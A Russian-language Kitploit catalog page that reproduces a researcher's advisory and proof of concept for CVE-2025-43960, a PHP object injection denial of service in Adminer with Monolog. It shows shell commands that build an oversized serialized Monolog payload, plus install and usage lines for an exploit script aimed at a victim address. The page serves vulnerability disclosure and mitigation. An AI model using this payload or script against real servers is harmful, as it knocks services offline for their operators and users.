Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-43960 — CVE-2025-43960 - Внедрение PHP-объектов в Adminer < 4.8.1 с Monolog (DoS) | Kitploit
Инструменты/GitHubGitHub/far00t01/cve-2025-43960
Генерация полезной нагрузкиАнализ уязвимостейАнализ КодаЭксплуатацияЭксплуатация веб-приложений
GitHubfar00t01/cve-2025-43960

CVE-2025-43960

CVE-2025-43960 - Внедрение PHP-объектов в Adminer < 4.8.1 с Monolog (DoS)

Репозиторий
111 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-43960 - PHP Object Injection в Adminer < 4.8.1 через Monolog - Отказ в обслуживании (DoS)

После нескольких месяцев ожидания ответа от MITRE я получил CVE-2025-43960 с атакой внедрения PHP-объектов против службы Adminer (<4.8.1), вызывающей отказ в обслуживании (DoS) через манипуляцию памятью.

https://github.com/user-attachments/assets/ebf7d8e8-01db-4d02-bb12-33321c749458

Краткое описание

Эта уязвимость позволяет удаленным неаутентифицированным злоумышленникам эксплуатировать экземпляры Adminer 4.8.1, использующие Monolog, вызывая отказ в обслуживании (DoS) через внедрение PHP-объектов. Вектор атаки не требует аутентификации или взаимодействия с пользователем, что делает эту проблему высокой серьезности (CVSS 7.5) с потенциалом повышения до 8.6 в определенных общих средах.

Предлагаемое описание

Adminer 4.8.1 при использовании Monolog для ведения журнала допускает отказ в обслуживании (потребление памяти) через специально сформированную сериализованную полезную нагрузку, например, со строкой s:1000000000, также известную как проблема внедрения PHP-объектов. Уязвимость затрагивает экземпляры Adminer, использующие Monolog для ведения журнала, где недоверенные пользовательские вводные данные десериализуются без надлежащей проверки. Отправляя большой десериализованный объект, злоумышленник может вызвать высокое потребление памяти, что приведет к неработоспособности интерфейса Adminer и вызовет DoS на всем сервере.

  • Хотя сервер может восстановиться через несколько минут, несколько одновременных запросов могут вызвать полный сбой, требующий ручного вмешательства для восстановления работы.

Оценка CVSS v3.1

Базовая оценка: 7.5 (Высокий)
Вектор: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Примечание для конкретных развертываний:

Если сбой Adminer также нарушает работу других служб/арендаторов (например, контейнера или общего процесса), может применяться Область: Изменена:

  • Вектор: AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H
  • Оценка: 8.6 (Высокий)

Дополнительная информация

Потенциальные меры по смягчению последствий

  • Избегайте использования unserialize() для недоверенных данных в Adminer и Monolog.
  • Принудительно установите лимиты памяти (memory_limit) в PHP для предотвращения чрезмерного потребления ресурсов.
  • Используйте allowed_classes в unserialize(), чтобы ограничить десериализацию неавторизованных классов.

Производитель продукта

  • Adminer

База кода уязвимого продукта

  • Adminer < 4.8.1 (последний стабильный релиз на момент тестирования)

Уязвимый компонент

  • Интеграция Monolog в Adminer

Проблемная функция

  • Внедрение PHP-объектов через unserialize()

Потенциальная область поражения

  • Любой экземпляр Adminer, где используется ведение журнала на основе Monolog

Доказательство концепции (PoC)

Генерация полезной нагрузки:

root@kitploit:~
head -c 1000000000 </dev/zero | tr '\0' 'D' > filler.txt
root@kitploit:~
echo 'O:32:"Monolog\\Handler\\SyslogUdpHandler":2:{
   s:9:"*socket";r:2;
   s:10:"*handler";s:1000000000:"'$(cat filler.txt)'";
 }' > payload.txt

Воздействие:

  • Сервер переходит в состояние загрузки, делая Adminer недоступным.
  • Внешний интерфейс полностью исчезает, пока соединение активно.
  • Когда атака прекращается, сервер восстанавливается через несколько минут, если только не используется несколько машин (сценарий DDoS).

Требования к установке

  • Python: Убедитесь, что у вас установлен Python 3.x. Вы можете проверить это, выполнив python3 --version в терминале.

Зависимости Python

  • Flask: Используется для запуска локального HTTP-сервера, который обслуживает полезную нагрузку.
  • requests: Используется для взаимодействия с целевым приложением в процессе эксплуатации.

Установка

root@kitploit:~
git clone https://github.com/far00t01/CVE-2025-43960
cd CVE-2025-43960 
pip install -r requirement.txt
python3 cve-2025-43960.py

Использование эксплойта:

root@kitploit:~
python3 cve-2025-43960.py 

Usage: cve-2025-43960.py <ip-listener> <port-listener> <ip-victim:port>
Example: python3 cve-2025-43960.py 198.51.100.11 80 203.0.113.11:8000

Ссылки

  • https://www.adminer.org
  • https://github.com/vrana/adminer
  • https://github.com/Seldaek/monolog
  • https://www.cvedetails.com/product/44183/Adminer-Adminer.html?vendor_id=17755
  • https://cwe.mitre.org/data/definitions/502.html
  • https://cwe.mitre.org/data/definitions/400.html
  • https://cwe.mitre.org/data/definitions/789.html

Обнаружитель

Fabian Rosales (@far00t01) Medium.

Скачать инструмент